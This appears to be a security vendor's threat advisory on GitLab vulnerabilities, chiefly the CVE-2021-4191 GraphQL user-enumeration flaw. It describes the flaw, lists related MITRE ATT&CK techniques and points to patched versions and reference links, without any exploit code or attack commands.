Thousands of GitLab instances impacted by multiple security flaws

Threat Advisories

Thousands of GitLab instances impacted by multiple security flaws

March 4, 2022

THREAT LEVEL: Amber.

For a detailed advisory, download the pdf file here

Multiple security vulnerabilities have been discovered by researchers in GitLab, an open-source DevOps software. Some of these flaws could allow an unauthenticated remote attacker to retrieve all information linked to GitLab users and further launch brute force attacks.

The vulnerability tracked as CVE-2021-4191 is one of the prominent issue for which GitLab pushed a fix. This information disclosure vulnerability is caused by a missing authentication check when using the GitLab GraphQL API queries that may allow a remote, unauthenticated attacker to obtain registered GitLab usernames, names, and email addresses. Due to the availability of the Metasploit module, there is a probability that this vulnerability might be exploited in the wild.

Organizations should update to versions 14.8.2, 14.7.4, and 14.6.5 to remediate these vulnerabilities.

Potential MITRE ATT&CK TTPs are:

TA0001: Initial Access

T1190: Exploit-public facing application

TA0007: Discovery

T1087: Account Discovery

TA0006: Credential Access T1110: Brute Force

Vulnerability Detail

Patch Link

https://gitlab.com/gitlab-org/omnibus-gitlab/-/tree/14.8.2-Security-Hotpatches/config/patches/gitlab-rails

https://about.gitlab.com/update/

https://docs.gitlab.com/runner/install/linux-repository.html#updating-the-runner

References

https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/

https://github.com/rapid7/metasploit-framework/pull/16252

https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/

 

Recent Posts

Join Our Newsletter 14,000+ subscribers and growing! Get top cybersecurity news delivered directly to your inbox.